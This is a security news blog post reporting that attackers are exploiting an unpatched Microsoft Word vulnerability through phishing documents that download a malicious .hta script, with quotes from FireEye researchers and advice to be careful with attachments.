PINDROP BLOG

Attackers Targeting Microsoft Word Zero Day

Attackers are targeting a newly disclosed, unpatched vulnerability in Microsoft Word that can be used to install malware silently on victims’ computers.

The attacks are using rigged Word documents attached to phishing emails, and when a victim opens one of the malicious documents, the embedded exploit code will immediately connect to a server controlled by the attackers. From there, the infection routine involves downloading files from the attacker’s server and then opens a second Word document.

“When the user opens the document, winword.exe issues a HTTP request to a remote server to retrieve a malicious .hta file, which appears as a fake RTF file. The Microsoft HTA application loads and executes the malicious script. In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link,” researchers from FireEye said in a post on the attacks.

“This vulnerability allows a malicious actor to execute a Visual Basic script when the user opens a document containing an embedded exploit.”

The exploit code used in these attacks is able to bypass many of the exploit mitigations that Microsoft has added to Windows over the years, making it especially dangerous. Those mitigations, such as DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization), are designed to prevent successful exploitation of certain vulnerabilities from having significant effects on the underlying operating system. The vulnerability affects Windows 10, the latest and most secure version of the OS, as well as older versions. Microsoft has not said when it plans to patch the bug, but April 11 is the next scheduled patch release date.

Some network-level email filtering appliances may catch the phishing emails used in these attacks, but users should always be careful of attachments in messages from unfamiliar senders. FireEye’s researchers said the attacks they have observed are installing a number of different kinds of malware.

“This vulnerability allows a malicious actor to execute a Visual Basic script when the user opens a document containing an embedded exploit. FireEye has observed several Office documents exploiting the vulnerability that download and execute malware payloads from different well-known malware families,” FireEye said.